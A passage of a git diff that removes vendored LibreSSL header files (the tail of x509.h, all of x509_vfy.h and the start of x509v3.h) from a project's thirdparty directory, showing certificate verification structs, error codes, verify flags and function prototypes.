-#define X509_R_CERT_ALREADY_IN_HASH_TABLE		 101
-#define X509_R_ERR_ASN1_LIB				 102
-#define X509_R_INVALID_DIRECTORY			 113
-#define X509_R_INVALID_FIELD_NAME			 119
-#define X509_R_INVALID_TRUST				 123
-#define X509_R_KEY_TYPE_MISMATCH			 115
-#define X509_R_KEY_VALUES_MISMATCH			 116
-#define X509_R_LOADING_CERT_DIR				 103
-#define X509_R_LOADING_DEFAULTS				 104
-#define X509_R_METHOD_NOT_SUPPORTED			 124
-#define X509_R_NO_CERT_SET_FOR_US_TO_VERIFY		 105
-#define X509_R_PUBLIC_KEY_DECODE_ERROR			 125
-#define X509_R_PUBLIC_KEY_ENCODE_ERROR			 126
-#define X509_R_SHOULD_RETRY				 106
-#define X509_R_UNABLE_TO_FIND_PARAMETERS_IN_CHAIN	 107
-#define X509_R_UNABLE_TO_GET_CERTS_PUBLIC_KEY		 108
-#define X509_R_UNKNOWN_KEY_TYPE				 117
-#define X509_R_UNKNOWN_NID				 109
-#define X509_R_UNKNOWN_PURPOSE_ID			 121
-#define X509_R_UNKNOWN_TRUST_ID				 120
-#define X509_R_UNSUPPORTED_ALGORITHM			 111
-#define X509_R_WRONG_LOOKUP_TYPE			 112
-#define X509_R_WRONG_TYPE				 122
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/x509_vfy.h b/thirdparty/libressl/include/openssl/x509_vfy.h
deleted file mode 100644
index b58d49d..0000000
--- a/thirdparty/libressl/include/openssl/x509_vfy.h
+++ /dev/null
@@ -1,582 +0,0 @@
-/* $OpenBSD: x509_vfy.h,v 1.18 2016/12/21 15:15:45 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_X509_H
-#include <openssl/x509.h>
-/* openssl/x509.h ends up #include-ing this file at about the only
- * appropriate moment. */
-#endif
-
-#ifndef HEADER_X509_VFY_H
-#define HEADER_X509_VFY_H
-
-#include <openssl/opensslconf.h>
-
-#ifndef OPENSSL_NO_LHASH
-#include <openssl/lhash.h>
-#endif
-#include <openssl/bio.h>
-#include <openssl/crypto.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct x509_file_st
-	{
-	int num_paths;	/* number of paths to files or directories */
-	int num_alloced;
-	char **paths;	/* the list of paths or directories */
-	int *path_type;
-	} X509_CERT_FILE_CTX;
-
-/*******************************/
-/*
-SSL_CTX -> X509_STORE    
-		-> X509_LOOKUP
-			->X509_LOOKUP_METHOD
-		-> X509_LOOKUP
-			->X509_LOOKUP_METHOD
- 
-SSL	-> X509_STORE_CTX
-		->X509_STORE    
-
-The X509_STORE holds the tables etc for verification stuff.
-A X509_STORE_CTX is used while validating a single certificate.
-The X509_STORE has X509_LOOKUPs for looking up certs.
-The X509_STORE then calls a function to actually verify the
-certificate chain.
-*/
-
-#define X509_LU_RETRY		-1
-#define X509_LU_FAIL		0
-#define X509_LU_X509		1
-#define X509_LU_CRL		2
-#define X509_LU_PKEY		3
-
-typedef struct x509_object_st
-	{
-	/* one of the above types */
-	int type;
-	union	{
-		char *ptr;
-		X509 *x509;
-		X509_CRL *crl;
-		EVP_PKEY *pkey;
-		} data;
-	} X509_OBJECT;
-
-typedef struct x509_lookup_st X509_LOOKUP;
-
-DECLARE_STACK_OF(X509_LOOKUP)
-DECLARE_STACK_OF(X509_OBJECT)
-
-/* This is a static that defines the function interface */
-typedef struct x509_lookup_method_st
-	{
-	const char *name;
-	int (*new_item)(X509_LOOKUP *ctx);
-	void (*free)(X509_LOOKUP *ctx);
-	int (*init)(X509_LOOKUP *ctx);
-	int (*shutdown)(X509_LOOKUP *ctx);
-	int (*ctrl)(X509_LOOKUP *ctx,int cmd,const char *argc,long argl,
-			char **ret);
-	int (*get_by_subject)(X509_LOOKUP *ctx,int type,X509_NAME *name,
-			      X509_OBJECT *ret);
-	int (*get_by_issuer_serial)(X509_LOOKUP *ctx,int type,X509_NAME *name,
-				    ASN1_INTEGER *serial,X509_OBJECT *ret);
-	int (*get_by_fingerprint)(X509_LOOKUP *ctx,int type,
-				  unsigned char *bytes,int len,
-				  X509_OBJECT *ret);
-	int (*get_by_alias)(X509_LOOKUP *ctx,int type,char *str,int len,
-			    X509_OBJECT *ret);
-	} X509_LOOKUP_METHOD;
-
-typedef struct X509_VERIFY_PARAM_ID_st X509_VERIFY_PARAM_ID;
-
-/* This structure hold all parameters associated with a verify operation
- * by including an X509_VERIFY_PARAM structure in related structures the
- * parameters used can be customized
- */
-
-typedef struct X509_VERIFY_PARAM_st
-	{
-	char *name;
-	time_t check_time;	/* Time to use */
-	unsigned long inh_flags; /* Inheritance flags */
-	unsigned long flags;	/* Various verify flags */
-	int purpose;		/* purpose to check untrusted certificates */
-	int trust;		/* trust setting to check */
-	int depth;		/* Verify depth */
-	STACK_OF(ASN1_OBJECT) *policies;	/* Permissible policies */
-	X509_VERIFY_PARAM_ID *id;	/* opaque ID data */
-} X509_VERIFY_PARAM;
-
-DECLARE_STACK_OF(X509_VERIFY_PARAM)
-
-/* This is used to hold everything.  It is used for all certificate
- * validation.  Once we have a certificate chain, the 'verify'
- * function is then called to actually check the cert chain. */
-struct x509_store_st
-	{
-	/* The following is a cache of trusted certs */
-	int cache; 	/* if true, stash any hits */
-	STACK_OF(X509_OBJECT) *objs;	/* Cache of all objects */
-
-	/* These are external lookup methods */
-	STACK_OF(X509_LOOKUP) *get_cert_methods;
-
-	X509_VERIFY_PARAM *param;
-
-	/* Callbacks for various operations */
-	int (*verify)(X509_STORE_CTX *ctx);	/* called to verify a certificate */
-	int (*verify_cb)(int ok,X509_STORE_CTX *ctx);	/* error callback */
-	int (*get_issuer)(X509 **issuer, X509_STORE_CTX *ctx, X509 *x);	/* get issuers cert from ctx */
-	int (*check_issued)(X509_STORE_CTX *ctx, X509 *x, X509 *issuer); /* check issued */
-	int (*check_revocation)(X509_STORE_CTX *ctx); /* Check revocation status of chain */
-	int (*get_crl)(X509_STORE_CTX *ctx, X509_CRL **crl, X509 *x); /* retrieve CRL */
-	int (*check_crl)(X509_STORE_CTX *ctx, X509_CRL *crl); /* Check CRL validity */
-	int (*cert_crl)(X509_STORE_CTX *ctx, X509_CRL *crl, X509 *x); /* Check certificate against CRL */
-	STACK_OF(X509) * (*lookup_certs)(X509_STORE_CTX *ctx, X509_NAME *nm);
-	STACK_OF(X509_CRL) * (*lookup_crls)(X509_STORE_CTX *ctx, X509_NAME *nm);
-	int (*cleanup)(X509_STORE_CTX *ctx);
-
-	CRYPTO_EX_DATA ex_data;
-	int references;
-	} /* X509_STORE */;
-
-int X509_STORE_set_depth(X509_STORE *store, int depth);
-
-#define X509_STORE_set_verify_cb_func(ctx,func) ((ctx)->verify_cb=(func))
-#define X509_STORE_set_verify_func(ctx,func)	((ctx)->verify=(func))
-
-/* This is the functions plus an instance of the local variables. */
-struct x509_lookup_st
-	{
-	int init;			/* have we been started */
-	int skip;			/* don't use us. */
-	X509_LOOKUP_METHOD *method;	/* the functions */
-	char *method_data;		/* method data */
-
-	X509_STORE *store_ctx;	/* who owns us */
-	} /* X509_LOOKUP */;
-
-/* This is a used when verifying cert chains.  Since the
- * gathering of the cert chain can take some time (and have to be
- * 'retried', this needs to be kept and passed around. */
-struct x509_store_ctx_st      /* X509_STORE_CTX */
-	{
-	X509_STORE *ctx;
-	int current_method;	/* used when looking up certs */
-
-	/* The following are set by the caller */
-	X509 *cert;		/* The cert to check */
-	STACK_OF(X509) *untrusted;	/* chain of X509s - untrusted - passed in */
-	STACK_OF(X509_CRL) *crls;	/* set of CRLs passed in */
-
-	X509_VERIFY_PARAM *param;
-	void *other_ctx;	/* Other info for use with get_issuer() */
-
-	/* Callbacks for various operations */
-	int (*verify)(X509_STORE_CTX *ctx);	/* called to verify a certificate */
-	int (*verify_cb)(int ok,X509_STORE_CTX *ctx);		/* error callback */
-	int (*get_issuer)(X509 **issuer, X509_STORE_CTX *ctx, X509 *x);	/* get issuers cert from ctx */
-	int (*check_issued)(X509_STORE_CTX *ctx, X509 *x, X509 *issuer); /* check issued */
-	int (*check_revocation)(X509_STORE_CTX *ctx); /* Check revocation status of chain */
-	int (*get_crl)(X509_STORE_CTX *ctx, X509_CRL **crl, X509 *x); /* retrieve CRL */
-	int (*check_crl)(X509_STORE_CTX *ctx, X509_CRL *crl); /* Check CRL validity */
-	int (*cert_crl)(X509_STORE_CTX *ctx, X509_CRL *crl, X509 *x); /* Check certificate against CRL */
-	int (*check_policy)(X509_STORE_CTX *ctx);
-	STACK_OF(X509) * (*lookup_certs)(X509_STORE_CTX *ctx, X509_NAME *nm);
-	STACK_OF(X509_CRL) * (*lookup_crls)(X509_STORE_CTX *ctx, X509_NAME *nm);
-	int (*cleanup)(X509_STORE_CTX *ctx);
-
-	/* The following is built up */
-	int valid;		/* if 0, rebuild chain */
-	int last_untrusted;	/* index of last untrusted cert */
-	STACK_OF(X509) *chain; 		/* chain of X509s - built up and trusted */
-	X509_POLICY_TREE *tree;	/* Valid policy tree */
-
-	int explicit_policy;	/* Require explicit policy value */
-
-	/* When something goes wrong, this is why */
-	int error_depth;
-	int error;
-	X509 *current_cert;
-	X509 *current_issuer;	/* cert currently being tested as valid issuer */
-	X509_CRL *current_crl;	/* current CRL */
-
-	int current_crl_score;  /* score of current CRL */
-	unsigned int current_reasons;  /* Reason mask */
-
-	X509_STORE_CTX *parent; /* For CRL path validation: parent context */
-
-	CRYPTO_EX_DATA ex_data;
-	} /* X509_STORE_CTX */;
-
-void X509_STORE_CTX_set_depth(X509_STORE_CTX *ctx, int depth);
-
-#define X509_STORE_CTX_set_app_data(ctx,data) \
-	X509_STORE_CTX_set_ex_data(ctx,0,data)
-#define X509_STORE_CTX_get_app_data(ctx) \
-	X509_STORE_CTX_get_ex_data(ctx,0)
-
-#define X509_L_FILE_LOAD	1
-#define X509_L_ADD_DIR		2
-#define X509_L_MEM		3
-
-#define X509_LOOKUP_load_file(x,name,type) \
-		X509_LOOKUP_ctrl((x),X509_L_FILE_LOAD,(name),(long)(type),NULL)
-
-#define X509_LOOKUP_add_dir(x,name,type) \
-		X509_LOOKUP_ctrl((x),X509_L_ADD_DIR,(name),(long)(type),NULL)
-
-#define X509_LOOKUP_add_mem(x,iov,type) \
-		X509_LOOKUP_ctrl((x),X509_L_MEM,(const char *)(iov),\
-		(long)(type),NULL)
-
-#define		X509_V_OK					0
-#define		X509_V_ERR_UNSPECIFIED				1
-#define		X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT		2
-#define		X509_V_ERR_UNABLE_TO_GET_CRL			3
-#define		X509_V_ERR_UNABLE_TO_DECRYPT_CERT_SIGNATURE	4
-#define		X509_V_ERR_UNABLE_TO_DECRYPT_CRL_SIGNATURE	5
-#define		X509_V_ERR_UNABLE_TO_DECODE_ISSUER_PUBLIC_KEY	6
-#define		X509_V_ERR_CERT_SIGNATURE_FAILURE		7
-#define		X509_V_ERR_CRL_SIGNATURE_FAILURE		8
-#define		X509_V_ERR_CERT_NOT_YET_VALID			9
-#define		X509_V_ERR_CERT_HAS_EXPIRED			10
-#define		X509_V_ERR_CRL_NOT_YET_VALID			11
-#define		X509_V_ERR_CRL_HAS_EXPIRED			12
-#define		X509_V_ERR_ERROR_IN_CERT_NOT_BEFORE_FIELD	13
-#define		X509_V_ERR_ERROR_IN_CERT_NOT_AFTER_FIELD	14
-#define		X509_V_ERR_ERROR_IN_CRL_LAST_UPDATE_FIELD	15
-#define		X509_V_ERR_ERROR_IN_CRL_NEXT_UPDATE_FIELD	16
-#define		X509_V_ERR_OUT_OF_MEM				17
-#define		X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT		18
-#define		X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN		19
-#define		X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY	20
-#define		X509_V_ERR_UNABLE_TO_VERIFY_LEAF_SIGNATURE	21
-#define		X509_V_ERR_CERT_CHAIN_TOO_LONG			22
-#define		X509_V_ERR_CERT_REVOKED				23
-#define		X509_V_ERR_INVALID_CA				24
-#define		X509_V_ERR_PATH_LENGTH_EXCEEDED			25
-#define		X509_V_ERR_INVALID_PURPOSE			26
-#define		X509_V_ERR_CERT_UNTRUSTED			27
-#define		X509_V_ERR_CERT_REJECTED			28
-/* These are 'informational' when looking for issuer cert */
-#define		X509_V_ERR_SUBJECT_ISSUER_MISMATCH		29
-#define		X509_V_ERR_AKID_SKID_MISMATCH			30
-#define		X509_V_ERR_AKID_ISSUER_SERIAL_MISMATCH		31
-#define		X509_V_ERR_KEYUSAGE_NO_CERTSIGN			32
-
-#define		X509_V_ERR_UNABLE_TO_GET_CRL_ISSUER		33
-#define		X509_V_ERR_UNHANDLED_CRITICAL_EXTENSION		34
-#define		X509_V_ERR_KEYUSAGE_NO_CRL_SIGN			35
-#define		X509_V_ERR_UNHANDLED_CRITICAL_CRL_EXTENSION	36
-#define		X509_V_ERR_INVALID_NON_CA			37
-#define		X509_V_ERR_PROXY_PATH_LENGTH_EXCEEDED		38
-#define		X509_V_ERR_KEYUSAGE_NO_DIGITAL_SIGNATURE	39
-#define		X509_V_ERR_PROXY_CERTIFICATES_NOT_ALLOWED	40
-
-#define		X509_V_ERR_INVALID_EXTENSION			41
-#define		X509_V_ERR_INVALID_POLICY_EXTENSION		42
-#define		X509_V_ERR_NO_EXPLICIT_POLICY			43
-#define		X509_V_ERR_DIFFERENT_CRL_SCOPE			44
-#define		X509_V_ERR_UNSUPPORTED_EXTENSION_FEATURE	45
-
-#define		X509_V_ERR_UNNESTED_RESOURCE			46
-
-#define		X509_V_ERR_PERMITTED_VIOLATION			47
-#define		X509_V_ERR_EXCLUDED_VIOLATION			48
-#define		X509_V_ERR_SUBTREE_MINMAX			49
-#define		X509_V_ERR_UNSUPPORTED_CONSTRAINT_TYPE		51
-#define		X509_V_ERR_UNSUPPORTED_CONSTRAINT_SYNTAX	52
-#define		X509_V_ERR_UNSUPPORTED_NAME_SYNTAX		53
-#define		X509_V_ERR_CRL_PATH_VALIDATION_ERROR		54
-
-/* The application is not happy */
-#define		X509_V_ERR_APPLICATION_VERIFICATION		50
-
-/* Host, email and IP check errors */
-#define		X509_V_ERR_HOSTNAME_MISMATCH			62
-#define		X509_V_ERR_EMAIL_MISMATCH			63
-#define		X509_V_ERR_IP_ADDRESS_MISMATCH			64
-
-/* Caller error */
-#define		X509_V_ERR_INVALID_CALL				65
-/* Issuer lookup error */
-#define		X509_V_ERR_STORE_LOOKUP				66
-
-/* Certificate verify flags */
-
-/* Send issuer+subject checks to verify_cb */
-#define	X509_V_FLAG_CB_ISSUER_CHECK		0x1
-/* Use check time instead of current time */
-#define	X509_V_FLAG_USE_CHECK_TIME		0x2
-/* Lookup CRLs */
-#define	X509_V_FLAG_CRL_CHECK			0x4
-/* Lookup CRLs for whole chain */
-#define	X509_V_FLAG_CRL_CHECK_ALL		0x8
-/* Ignore unhandled critical extensions */
-#define	X509_V_FLAG_IGNORE_CRITICAL		0x10
-/* Disable workarounds for broken certificates */
-#define	X509_V_FLAG_X509_STRICT			0x20
-/* Enable proxy certificate validation */
-#define	X509_V_FLAG_ALLOW_PROXY_CERTS		0x40
-/* Enable policy checking */
-#define X509_V_FLAG_POLICY_CHECK		0x80
-/* Policy variable require-explicit-policy */
-#define X509_V_FLAG_EXPLICIT_POLICY		0x100
-/* Policy variable inhibit-any-policy */
-#define	X509_V_FLAG_INHIBIT_ANY			0x200
-/* Policy variable inhibit-policy-mapping */
-#define X509_V_FLAG_INHIBIT_MAP			0x400
-/* Notify callback that policy is OK */
-#define X509_V_FLAG_NOTIFY_POLICY		0x800
-/* Extended CRL features such as indirect CRLs, alternate CRL signing keys */
-#define X509_V_FLAG_EXTENDED_CRL_SUPPORT	0x1000
-/* Delta CRL support */
-#define X509_V_FLAG_USE_DELTAS			0x2000
-/* Check selfsigned CA signature */
-#define X509_V_FLAG_CHECK_SS_SIGNATURE		0x4000
-/* Use trusted store first */
-#define X509_V_FLAG_TRUSTED_FIRST		0x8000
-/* Allow partial chains if at least one certificate is in trusted store */
-#define X509_V_FLAG_PARTIAL_CHAIN		0x80000
-
-/* If the initial chain is not trusted, do not attempt to build an alternative
- * chain. Alternate chain checking was introduced in 1.0.2b. Setting this flag
- * will force the behaviour to match that of previous versions. */
-#define X509_V_FLAG_NO_ALT_CHAINS		0x100000
-
-/* Do not check certificate or CRL validity against current time. */
-#define X509_V_FLAG_NO_CHECK_TIME		0x200000
-
-#define X509_VP_FLAG_DEFAULT			0x1
-#define X509_VP_FLAG_OVERWRITE			0x2
-#define X509_VP_FLAG_RESET_FLAGS		0x4
-#define X509_VP_FLAG_LOCKED			0x8
-#define X509_VP_FLAG_ONCE			0x10
-
-/* Internal use: mask of policy related options */
-#define X509_V_FLAG_POLICY_MASK (X509_V_FLAG_POLICY_CHECK \
-				| X509_V_FLAG_EXPLICIT_POLICY \
-				| X509_V_FLAG_INHIBIT_ANY \
-				| X509_V_FLAG_INHIBIT_MAP)
-
-int X509_OBJECT_idx_by_subject(STACK_OF(X509_OBJECT) *h, int type,
-	     X509_NAME *name);
-X509_OBJECT *X509_OBJECT_retrieve_by_subject(STACK_OF(X509_OBJECT) *h,int type,X509_NAME *name);
-X509_OBJECT *X509_OBJECT_retrieve_match(STACK_OF(X509_OBJECT) *h, X509_OBJECT *x);
-void X509_OBJECT_up_ref_count(X509_OBJECT *a);
-void X509_OBJECT_free_contents(X509_OBJECT *a);
-X509_STORE *X509_STORE_new(void );
-void X509_STORE_free(X509_STORE *v);
-
-STACK_OF(X509)* X509_STORE_get1_certs(X509_STORE_CTX *st, X509_NAME *nm);
-STACK_OF(X509_CRL)* X509_STORE_get1_crls(X509_STORE_CTX *st, X509_NAME *nm);
-int X509_STORE_set_flags(X509_STORE *ctx, unsigned long flags);
-int X509_STORE_set_purpose(X509_STORE *ctx, int purpose);
-int X509_STORE_set_trust(X509_STORE *ctx, int trust);
-int X509_STORE_set1_param(X509_STORE *ctx, X509_VERIFY_PARAM *pm);
-
-void X509_STORE_set_verify_cb(X509_STORE *ctx,
-				  int (*verify_cb)(int, X509_STORE_CTX *));
-
-X509_STORE_CTX *X509_STORE_CTX_new(void);
-
-int X509_STORE_CTX_get1_issuer(X509 **issuer, X509_STORE_CTX *ctx, X509 *x);
-
-void X509_STORE_CTX_free(X509_STORE_CTX *ctx);
-int X509_STORE_CTX_init(X509_STORE_CTX *ctx, X509_STORE *store,
-			 X509 *x509, STACK_OF(X509) *chain);
-void X509_STORE_CTX_trusted_stack(X509_STORE_CTX *ctx, STACK_OF(X509) *sk);
-void X509_STORE_CTX_cleanup(X509_STORE_CTX *ctx);
-
-X509_LOOKUP *X509_STORE_add_lookup(X509_STORE *v, X509_LOOKUP_METHOD *m);
-
-X509_LOOKUP_METHOD *X509_LOOKUP_hash_dir(void);
-X509_LOOKUP_METHOD *X509_LOOKUP_file(void);
-X509_LOOKUP_METHOD *X509_LOOKUP_mem(void);
-
-int X509_STORE_add_cert(X509_STORE *ctx, X509 *x);
-int X509_STORE_add_crl(X509_STORE *ctx, X509_CRL *x);
-
-int X509_STORE_get_by_subject(X509_STORE_CTX *vs,int type,X509_NAME *name,
-	X509_OBJECT *ret);
-
-int X509_LOOKUP_ctrl(X509_LOOKUP *ctx, int cmd, const char *argc,
-	long argl, char **ret);
-
-int X509_load_cert_file(X509_LOOKUP *ctx, const char *file, int type);
-int X509_load_crl_file(X509_LOOKUP *ctx, const char *file, int type);
-int X509_load_cert_crl_file(X509_LOOKUP *ctx, const char *file, int type);
-
-
-X509_LOOKUP *X509_LOOKUP_new(X509_LOOKUP_METHOD *method);
-void X509_LOOKUP_free(X509_LOOKUP *ctx);
-int X509_LOOKUP_init(X509_LOOKUP *ctx);
-int X509_LOOKUP_by_subject(X509_LOOKUP *ctx, int type, X509_NAME *name,
-	X509_OBJECT *ret);
-int X509_LOOKUP_by_issuer_serial(X509_LOOKUP *ctx, int type, X509_NAME *name,
-	ASN1_INTEGER *serial, X509_OBJECT *ret);
-int X509_LOOKUP_by_fingerprint(X509_LOOKUP *ctx, int type,
-	unsigned char *bytes, int len, X509_OBJECT *ret);
-int X509_LOOKUP_by_alias(X509_LOOKUP *ctx, int type, char *str,
-	int len, X509_OBJECT *ret);
-int X509_LOOKUP_shutdown(X509_LOOKUP *ctx);
-
-int	X509_STORE_load_locations (X509_STORE *ctx,
-		const char *file, const char *dir);
-int	X509_STORE_load_mem(X509_STORE *ctx, void *buf, int len);
-int	X509_STORE_set_default_paths(X509_STORE *ctx);
-
-int X509_STORE_CTX_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-	CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int	X509_STORE_CTX_set_ex_data(X509_STORE_CTX *ctx,int idx,void *data);
-void *	X509_STORE_CTX_get_ex_data(X509_STORE_CTX *ctx,int idx);
-int	X509_STORE_CTX_get_error(X509_STORE_CTX *ctx);
-void	X509_STORE_CTX_set_error(X509_STORE_CTX *ctx,int s);
-int	X509_STORE_CTX_get_error_depth(X509_STORE_CTX *ctx);
-X509 *	X509_STORE_CTX_get_current_cert(X509_STORE_CTX *ctx);
-X509 *X509_STORE_CTX_get0_current_issuer(X509_STORE_CTX *ctx);
-X509_CRL *X509_STORE_CTX_get0_current_crl(X509_STORE_CTX *ctx);
-X509_STORE_CTX *X509_STORE_CTX_get0_parent_ctx(X509_STORE_CTX *ctx);
-STACK_OF(X509) *X509_STORE_CTX_get_chain(X509_STORE_CTX *ctx);
-STACK_OF(X509) *X509_STORE_CTX_get1_chain(X509_STORE_CTX *ctx);
-void	X509_STORE_CTX_set_cert(X509_STORE_CTX *c,X509 *x);
-void	X509_STORE_CTX_set_chain(X509_STORE_CTX *c,STACK_OF(X509) *sk);
-void	X509_STORE_CTX_set0_crls(X509_STORE_CTX *c,STACK_OF(X509_CRL) *sk);
-int X509_STORE_CTX_set_purpose(X509_STORE_CTX *ctx, int purpose);
-int X509_STORE_CTX_set_trust(X509_STORE_CTX *ctx, int trust);
-int X509_STORE_CTX_purpose_inherit(X509_STORE_CTX *ctx, int def_purpose,
-				int purpose, int trust);
-void X509_STORE_CTX_set_flags(X509_STORE_CTX *ctx, unsigned long flags);
-void X509_STORE_CTX_set_time(X509_STORE_CTX *ctx, unsigned long flags,
-								time_t t);
-void X509_STORE_CTX_set_verify_cb(X509_STORE_CTX *ctx,
-				  int (*verify_cb)(int, X509_STORE_CTX *));
-  
-X509_POLICY_TREE *X509_STORE_CTX_get0_policy_tree(X509_STORE_CTX *ctx);
-int X509_STORE_CTX_get_explicit_policy(X509_STORE_CTX *ctx);
-
-X509_VERIFY_PARAM *X509_STORE_CTX_get0_param(X509_STORE_CTX *ctx);
-void X509_STORE_CTX_set0_param(X509_STORE_CTX *ctx, X509_VERIFY_PARAM *param);
-int X509_STORE_CTX_set_default(X509_STORE_CTX *ctx, const char *name);
-
-/* X509_VERIFY_PARAM functions */
-
-X509_VERIFY_PARAM *X509_VERIFY_PARAM_new(void);
-void X509_VERIFY_PARAM_free(X509_VERIFY_PARAM *param);
-int X509_VERIFY_PARAM_inherit(X509_VERIFY_PARAM *to,
-						const X509_VERIFY_PARAM *from);
-int X509_VERIFY_PARAM_set1(X509_VERIFY_PARAM *to, 
-						const X509_VERIFY_PARAM *from);
-int X509_VERIFY_PARAM_set1_name(X509_VERIFY_PARAM *param, const char *name);
-int X509_VERIFY_PARAM_set_flags(X509_VERIFY_PARAM *param, unsigned long flags);
-int X509_VERIFY_PARAM_clear_flags(X509_VERIFY_PARAM *param,
-							unsigned long flags);
-unsigned long X509_VERIFY_PARAM_get_flags(X509_VERIFY_PARAM *param);
-int X509_VERIFY_PARAM_set_purpose(X509_VERIFY_PARAM *param, int purpose);
-int X509_VERIFY_PARAM_set_trust(X509_VERIFY_PARAM *param, int trust);
-void X509_VERIFY_PARAM_set_depth(X509_VERIFY_PARAM *param, int depth);
-void X509_VERIFY_PARAM_set_time(X509_VERIFY_PARAM *param, time_t t);
-int X509_VERIFY_PARAM_add0_policy(X509_VERIFY_PARAM *param,
-						ASN1_OBJECT *policy);
-int X509_VERIFY_PARAM_set1_policies(X509_VERIFY_PARAM *param, 
-					STACK_OF(ASN1_OBJECT) *policies);
-int X509_VERIFY_PARAM_get_depth(const X509_VERIFY_PARAM *param);
-
-int X509_VERIFY_PARAM_add0_table(X509_VERIFY_PARAM *param);
-const X509_VERIFY_PARAM *X509_VERIFY_PARAM_lookup(const char *name);
-void X509_VERIFY_PARAM_table_cleanup(void);
-
-int X509_policy_check(X509_POLICY_TREE **ptree, int *pexplicit_policy,
-			STACK_OF(X509) *certs,
-			STACK_OF(ASN1_OBJECT) *policy_oids,
-			unsigned int flags);
-
-void X509_policy_tree_free(X509_POLICY_TREE *tree);
-
-int X509_policy_tree_level_count(const X509_POLICY_TREE *tree);
-X509_POLICY_LEVEL *
-	X509_policy_tree_get0_level(const X509_POLICY_TREE *tree, int i);
-
-STACK_OF(X509_POLICY_NODE) *
-	X509_policy_tree_get0_policies(const X509_POLICY_TREE *tree);
-
-STACK_OF(X509_POLICY_NODE) *
-	X509_policy_tree_get0_user_policies(const X509_POLICY_TREE *tree);
-
-int X509_policy_level_node_count(X509_POLICY_LEVEL *level);
-
-X509_POLICY_NODE *X509_policy_level_get0_node(X509_POLICY_LEVEL *level, int i);
-
-const ASN1_OBJECT *X509_policy_node_get0_policy(const X509_POLICY_NODE *node);
-
-STACK_OF(POLICYQUALINFO) *
-	X509_policy_node_get0_qualifiers(const X509_POLICY_NODE *node);
-const X509_POLICY_NODE *
-	X509_policy_node_get0_parent(const X509_POLICY_NODE *node);
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
-
diff --git a/thirdparty/libressl/include/openssl/x509v3.h b/thirdparty/libressl/include/openssl/x509v3.h
deleted file mode 100644
index fbafd69..0000000
--- a/thirdparty/libressl/include/openssl/x509v3.h
+++ /dev/null
@@ -1,977 +0,0 @@
-/* $OpenBSD: x509v3.h,v 1.22 2017/06/22 17:28:00 jsing Exp $ */
-/* Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
- * project 1999.
- */
-/* ====================================================================
- * Copyright (c) 1999-2004 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer. 
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
